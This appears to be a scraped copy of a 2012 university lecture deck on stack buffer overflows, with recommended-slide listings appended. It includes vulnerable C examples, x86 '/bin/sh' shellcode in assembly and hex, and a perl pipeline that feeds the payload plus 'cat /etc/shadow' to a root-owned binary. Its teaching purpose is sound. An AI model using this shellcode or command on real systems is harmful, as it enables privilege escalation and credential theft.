buffer overflow
play

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material - PowerPoint PPT Presentation

Oct 02, 2022 •485 likes •783 views

Buffer Overflow CS461/ECE422 Spring 2012 Reading Material Based on Chapter 11 of the text Outline Buffer Overflow Stack Buffer Overflow Shell

  1. Buffer ¡Overflow ¡ CS461/ECE422 ¡ Spring ¡2012 ¡

  2. Reading ¡Material ¡ • Based ¡on ¡Chapter ¡11 ¡of ¡the ¡text ¡

  3. Outline ¡ • Buffer ¡Overflow ¡ • Stack ¡Buffer ¡Overflow ¡ • Shell ¡Code ¡ • Defenses ¡

  4. Buffer ¡Overflow ¡ • “A ¡condi)on ¡at ¡interface ¡under ¡which ¡ more ¡ input ¡can ¡be ¡placed ¡into ¡a ¡buffer ¡or ¡data ¡ holding ¡area ¡ than ¡the ¡capacity ¡allocated , ¡ overwri3ng ¡other ¡informa)on.” ¡ • Used ¡for ¡exploitaGon ¡ – Crash ¡ – Get ¡control ¡

  5. Example ¡ 1. #include <stdio.h> 2. #include <string.h> 3. int main(int argc, char *argv[]) { 4. int valid = 0; 5. char str1[8] = " ASECRET "; 6. char str2[8]; 7. gets (str2); 8. if ( strncmp (str1, str2, 8)==0) 9. valid = 1; 10. printf("VALID=%d", valid); 11. return 0; 12. }

  6. Example ¡ $ ./a.out ASECRET VALID=1 $ ./a.out HELLO VALID=0 $ ./a.out OVERFLOWOVERFLOW VALID=1 Why? ¡ ¡

  7. Example ¡ ¡ ¡ argv ¡ argv ¡ argc ¡ argc ¡ return ¡address ¡ return ¡address ¡ old ¡base ¡pointer ¡ old ¡base ¡pointer ¡ 0x0000000 ¡ 0x1000000 ¡ valid ¡ valid ¡ ¡ ¡ T ¡. ¡. ¡. ¡ FLOW ¡ str1[4-­‑7] ¡ str1[4-­‑7] ¡ ASECRE ¡ OVER ¡ str1[0-­‑3] ¡ str1[0-­‑3] ¡ . ¡. ¡. ¡ FLOW ¡ str2[4-­‑7] ¡ str2[4-­‑7] ¡ . ¡. ¡. ¡ OVER ¡ str2[0-­‑3] ¡ str2[0-­‑3] ¡ Before ¡gets(str2) ¡ AYer ¡gets(str2) ¡ str2=“OVERFLOWOVERFLOW” ¡

  8. Stack ¡Structure ¡Review ¡ void foo(char* c) { char buf[256]; previous ¡frames ¡ strcpy(buf, c); } frame ¡pointer ¡ funcGon ¡args ¡(char* ¡c) ¡ return ¡address ¡ saved ¡frame ¡pointer ¡ high ¡ buf[0-­‑255] ¡ mem ¡addresses ¡ low ¡ stack ¡pointer ¡

  9. Stack ¡Buffer ¡Overflow ¡ • Also ¡called ¡ Stack ¡smashing ¡ • Overflow ¡when ¡targeted ¡buffer ¡is ¡located ¡on ¡ stack , ¡as ¡a ¡ local ¡variable ¡in ¡ stack ¡frame ¡ of ¡a ¡funcGon ¡ • Overwrite ¡return ¡address/frame ¡pointer ¡or ¡pointer ¡to ¡ address ¡of ¡aback ¡code ¡in ¡memory ¡ • Example ¡in ¡next ¡slide ¡ – Overwrite ¡saved ¡return ¡address ¡(RA) ¡ – E.g., ¡overwrite ¡saved ¡RA ¡with ¡same ¡RA ¡of ¡funcGon ¡ to ¡re-­‑execute ¡it. ¡ ¡ ¡

  10. Example ¡ 1. #include <stdio.h> 2. #include <string.h> 3. void prompt(char * tag) { 4. char inp[16]; 5. printf(“Enter value for %s: “, tag); 6. gets(inp); 7. printf(“Hello your %s is %s\n”, tag, inp); 8. } 9. int main(int argc, char *argv[]) { 10. prompt(“name”); 11. }

  11. Example ¡ • Run ¡debugger, ¡prompt() ¡at ¡ 0x08048394 • inp ¡located ¡24 ¡bytes ¡under ¡current ¡frame ¡ptr ¡ – Pad ¡the ¡string ¡by ¡this ¡amount ¡(e.g. ¡24 ¡ A ’s) ¡ • Choose ¡a ¡nearby ¡stack ¡locaGon ¡( 0xbfffffe8 ) ¡to ¡ overwrite ¡current ¡frame ¡register ¡ • Overwrite ¡return ¡address ¡with ¡ 0x08048394 • Combine ¡this ¡data ¡together ¡into ¡binary ¡string ¡ perl –e ‘print pack (“H*”, hex string);’

  12. Example ¡ * ¡Lible ¡endian ¡ ¡ ¡ ¡ tag ¡ tag ¡ return ¡address ¡ return ¡address ¡ f0830408 ¡ 94830408 ¡ e8fgf ¡ old ¡base ¡pointer ¡ e8ff2f ¡ old ¡base ¡pointer ¡ AAAA ¡ ¡ ¡ AAAA ¡ ¡ ¡ . ¡. ¡. ¡ AAAA ¡ inp[12-­‑15] ¡ inp[12-­‑15] ¡ . ¡. ¡. ¡ AAAA ¡ inp[8-­‑11] ¡ inp[8-­‑11] ¡ . ¡. ¡. ¡ AAAA ¡ inp[4-­‑7] ¡ inp[4-­‑7] ¡ . ¡. ¡. ¡ AAAA ¡ inp[0-­‑3] ¡ inp[0-­‑3] ¡ Before ¡gets(..) ¡call ¡ AYer ¡gets(..) ¡call ¡ $ perl –e ' print pack(“H*”, hex string); ¡' | ./a.out Enter value for name: Hello your Re?pyy]uEA is AAAAAAAAAAAAAAAAAAAAAAAuyu Enter value for Kyyu: Hello your Kyyu is NNNN prompt(..) ¡is ¡called ¡twice! ¡ Segmentation fault ¡

  13. Stack ¡Buffer ¡Overflow ¡ • What ¡if ¡we ¡want ¡to ¡do ¡something ¡more ¡ interesGng ¡than ¡calling ¡ prompt (..) ¡twice? ¡ • Can ¡set ¡the ¡return ¡address ¡to ¡point ¡to ¡custom ¡ code ¡held ¡within ¡the ¡stack ¡frame ¡( shellcode ). ¡

  14. Shellcode ¡ • Want ¡to ¡transfer ¡execuGon ¡of ¡program ¡to ¡ code ¡stored ¡in ¡the ¡buffer ¡we ¡overflow. ¡ • Why ¡“shell” ¡code? ¡Launch ¡a ¡shell. ¡ – Run ¡any ¡program ¡ – With ¡privilege ¡of ¡exploited ¡program ¡

  15. Shellcode ¡ nop ¡sled ¡ nop int main(int argc, char * argv[]) nop { jmp find char *sh; cont: pop %esi char *args[2]; xor %eax, %eax To ¡x86 ¡assembly ¡ ¡ sh=“/bin/sh”; mov %al, 0x7*%esi) args[0] = sh; lea (%esi), %ebx mov %esi,0x8(%esi) args[1] = NULL; mov %eax,0xc(%esi) execve(sh, args, NULL); mov $0xb, %al } mov %esi, %ebx lea 0x8(%esi),%ecx Launches ¡Bourne ¡shell ¡ ¡( sh ) ¡on ¡Intel ¡Linux ¡ lea 0xc(%esi),%edx system ¡ int $0x80 find: call cont sh: .string “/bin/sh “ args: .long 0 .long 0 Payload ¡ To ¡hex ¡value ¡for ¡compiled ¡x86 ¡code ¡ 90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20

  16. Shellcode ¡ • Target ¡program ¡with ¡elevated ¡privileges ¡and ¡ vulnerable ¡buffer ¡ – E.g., ¡start ¡with ¡similar ¡program ¡to ¡previous ¡ inp ¡ example ¡and ¡say ¡it ¡is ¡owned ¡by ¡root. ¡ • Let’s ¡say ¡we ¡want ¡to ¡be ¡able ¡to ¡read ¡ /etc/ shadow , ¡which ¡needs ¡superuser ¡privilege, ¡but ¡ we ¡only ¡have ¡a ¡non-­‑root ¡account. ¡

  17. Shellcode ¡ Before ¡ gets(..) call ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡AYer ¡ gets(..) call ¡ previous ¡frame ¡ previous ¡frame ¡ Address ¡a ¡ args ¡ Address ¡a ¡ return ¡address ¡ Address ¡a ¡ saved ¡frame ¡pointer ¡ 0xbffffc08 ¡ shellcode ¡payload ¡ 88 ¡bytes ¡ buffer ¡ NOP ¡ Address ¡a ¡ NOP ¡ NOP ¡ 0xbffgc0 ¡ perl –e ‘print pack(“H*”, hex string ); print “cat /etc/shadow\n”;’ | ./a.out

  18. Shellcode ¡ • Before, ¡our ¡user ¡cannot ¡access ¡ /etc/shadow • This ¡exploit ¡code ¡will ¡open /bin/sh ¡and ¡ display ¡the ¡contents ¡of ¡ /etc/shadow ¡by ¡ sending ¡the ¡shell ¡the ¡ cat ¡command ¡using ¡root ¡ privilege

  19. Shellcode ¡ As ¡normal ¡user ¡ As ¡superuser ¡

  20. Shellcode ¡ • Some ¡notes ¡about ¡shellcode: ¡ – Shellcode ¡usually ¡comes ¡from ¡sites ¡like ¡ Metasploit ¡project. ¡ – Cannot ¡use ¡bytes ¡with ¡NULL ¡value. ¡Can ¡use ¡ ¡ xor %eax, %eax ¡ command ¡to ¡obtain ¡0 ¡value ¡ – Shellcode ¡is ¡mostly ¡used ¡to ¡allow ¡shell ¡commands ¡ to ¡execute ¡other ¡commands ¡and ¡send ¡back ¡data ¡ to ¡abacker. ¡

  21. Return ¡to ¡System ¡Call ¡ • Non-­‑executable ¡stack ¡defense ¡ – Cannot ¡execute ¡code ¡held ¡in ¡stack ¡ • Make ¡code ¡call ¡library ¡funcGon ¡through ¡a ¡set ¡ of ¡memory ¡locaGon ¡manipulaGons ¡ • RA ¡changed ¡to ¡jump ¡to ¡exisGng ¡system ¡library ¡ funcGon, ¡e.g. ¡ system(“shell command line”) ¡ in ¡order ¡to ¡launch ¡shell ¡commands. ¡ • Defend ¡by ¡randomizing ¡stack ¡and ¡system ¡ libraries ¡

  22. Defenses ¡ • Compile-­‑Time ¡ – Programming ¡Language ¡Choice ¡ – Extensions ¡/ ¡Safe ¡Libraries ¡ – Stack ¡ProtecGon ¡ • Run-­‑Time ¡ – Executable ¡Address ¡Space ¡ProtecGon ¡ – Address ¡Space ¡RandomizaGon ¡

  23. Compile-­‑Time ¡ • Programming ¡Language ¡Choice ¡ – High-­‑level ¡(e.g. ¡Java) ¡ • Strongly ¡typed ¡variables ¡ • OperaGons ¡permibed ¡ – Not ¡as ¡vulnerable ¡ • Range ¡checking ¡ – Downside, ¡resource ¡use ¡

  24. Compile-­‑Time ¡ • Extensions ¡/ ¡Safe ¡Libraries ¡ – Replace ¡standard ¡library ¡rouGnes ¡(e.g. ¡C ¡strings) ¡ with ¡safer ¡versions ¡ • Rewrite ¡source ¡with ¡new ¡calls ¡(like ¡ strlcpy(..) ) ¡ • Replace ¡whole ¡library ¡(like ¡libsafe), ¡provides ¡protecGon ¡ without ¡recompilaGon ¡ – Puts ¡addiGonal ¡checks ¡to ¡stop ¡some ¡buffer ¡overflow ¡abacks ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by

Chapter 10 Buffer Overflow Buffer Overflow Common attack mechanism first wide use by the Morris Worm in 1988 Prevention techniques known NX bit, stack canaries, ASLR Still of major concern Recent examples:

354 views • 21 slides
Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed

1 Buffer Overflows with Content 2 A Process Stack Buffer Overflow Common Techniques employed in buffer overflow exploits to create backdoors Execution of additional network services via the INETD daemon The addition of new users

497 views • 30 slides
History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood

History of the Stack Overflow Buffer Overflow Understood as early as 1972 Computer Security Technology Planning Study Morris Worm First

1.07k views • 42 slides
CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking &amp; Loading, continued Buffer Overflow Read: CSAPP2: section 3.12: out-of-bounds memory references &amp; buffer overflow K&amp;R:

775 views • 43 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow

Last time We finished up By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Buffer overflow defenses (and workarounds) Format string vulnerabilities Integer overflow vulnerabilities This time

1.29k views • 80 slides
IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A

IT 4500 : Information Security Secure Programming Dr Joe Francom Buffer Overflow What it is? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.

221 views • 3 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

873 views • 53 slides
Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Last time We continued By launching our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow fundamentals This time We will finish up By looking at Buffer Overflow overflows

1.33k views • 103 slides
Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format

Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format

Buffer Overflow EXAMPLE CASE STUDY WALKTHROUGH PADRAIGNIX 12/09/2019 Agenda ELF file format layout Buffer Overflow theory Example code Initial Investigation / Assembly Registers Tooling Fuzzing Shellcode /

700 views • 16 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow

Last time We continued By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Finish overflow attacks &amp; other vulnerabilities Overflow defenses Everything youve always wanted to know about

2.41k views • 197 slides
VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331:

VOTD: Buffer Overflow Engineering Secure Software Last Revised: August 17, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is Buffer Overflow? Writing data outside of the intended buffer (memory space) SWEN-331:

298 views • 6 slides
More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester

More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester

More Vulnerabilities (buffer overreads, format string, integer overflow, heap overflows) Chester Rebeiro Indian Institute of Technology Madras Buffer Overreads 2 Buffer Overread Example 3 Buffer Overread Example len read from command line

906 views • 76 slides
Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes &amp; Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes &amp; Koen Koning

Delta Pointers: Buffer Overflow Checks Without the Checks Tadde us Kroes &amp; Koen Koning Erik van der Kouwe Herbert Bos Cristiano Giuffrida June 19, 2018 Preview buffer[10] secret 2 Preview buffer[10] secret buffer[5] 2 Preview

934 views • 74 slides
Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow

Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow

CSE350/450 Lehigh University Fall 2016 Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow Shellcode Heap Overflow Format Strings Return-oriented Programming Metasploit 101 Anatomy of the Stack

1.83k views • 124 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.49k views • 117 slides
Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything

This time We will continue By looking at Buffer Overflow overflows Defenses and other memory safety vulnerabilities Everything youve always wanted to know about gdb but were too afraid to ask Overflow defenses Other memory

1.23k views • 95 slides
Optimal and Adaptive Filtering Murat ney M.Uney@ed.ac.uk Institute for Digital Communications

Optimal and Adaptive Filtering Murat ney M.Uney@ed.ac.uk Institute for Digital Communications

Optimal and Adaptive Filtering Murat ney M.Uney@ed.ac.uk Institute for Digital Communications (IDCOM) 20/07/2015 Murat ney (IDCOM) Optimal and Adaptive Filtering 20/07/2015 1 / 62 Table of Contents Optimal Filtering 1 Optimal filter

1.01k views • 72 slides
Lecture 3: Typed Lambda Calculus and Curry-Howard H. Geuvers Radboud University Nijmegen, NL

Lecture 3: Typed Lambda Calculus and Curry-Howard H. Geuvers Radboud University Nijmegen, NL

Lecture 3: Typed Lambda Calculus and Curry-Howard H. Geuvers Radboud University Nijmegen, NL 21st Estonian Winter School in Computer Science Winter 2016 H. Geuvers - Radboud Univ. EWSCS 2016 Typed -calculus 1 / 65 Outline H. Geuvers -

566 views • 42 slides
Interspecific strategic effects Interspecific strategic effects Interspecific strategic effects

Interspecific strategic effects Interspecific strategic effects Interspecific strategic effects

Interspecific strategic effects Interspecific strategic effects Interspecific strategic effects Interspecific strategic effects of mobility in predator of mobility in predator- -prey systems prey systems Fei Xu F i X Joint work with Dr.

787 views • 54 slides
The Smithsonian/NASA The Smithsonian/NASA Astrophysics Data System p y y Michael J Kurtz

The Smithsonian/NASA The Smithsonian/NASA Astrophysics Data System p y y Michael J Kurtz

The Smithsonian/NASA The Smithsonian/NASA Astrophysics Data System p y y Michael J Kurtz Michael J. Kurtz Harvard-Smithsonian Center for A t Astrophysics h i ADS Holdings ADS Holdings Astronomy 1.3M Physics Physics 3 3M

539 views • 31 slides
Singular Perturbations in Stochastic Control and Hamilton-Jacobi-Bellman Equation Hicham Kouhkouh

Singular Perturbations in Stochastic Control and Hamilton-Jacobi-Bellman Equation Hicham Kouhkouh

Singular Perturbations in Stochastic Control and Hamilton-Jacobi-Bellman Equation Hicham Kouhkouh joint work with Martino Bardi Dipartimento di Matematica Tullio Levi-Civita Universit` a di Padova kouhkouh@math.unipd.it IPAM Workshop

523 views • 13 slides
Synthesis of Ranking Functions and Synthesis of Inductive Invariants and Synthesis of

Synthesis of Ranking Functions and Synthesis of Inductive Invariants and Synthesis of

Synthesis of Ranking Functions and Synthesis of Inductive Invariants and Synthesis of Recurrence Sets via Constraint Solving Andreas Podelski January 17, 2012 1 Program Verification and Constraints Reasoning about program

422 views • 28 slides
Implied Volatility, Fundamental solutions, asymptotic analysis and symmetry methods, Linz, Ricam

Implied Volatility, Fundamental solutions, asymptotic analysis and symmetry methods, Linz, Ricam

Implied Volatility, Fundamental solutions, asymptotic analysis and symmetry methods, Linz, Ricam kick-off Workshop, September 11, 2008 Peter Laurence Dipartimento di Matematica e Facolt a di Statistica, Uni. Roma 1 Implied Volatility,

897 views • 57 slides
Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements

Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements

morris,bourlard@idiap.ch http://www.idiap.ch/ Missing-data methods with cepstral data Summary of work done at IDIAP Main achievements RESPITE meeting, 7-8 June 2002, Page 1 DUMA - Data Utility Maps from MLPs Cant

296 views • 11 slides

More recommend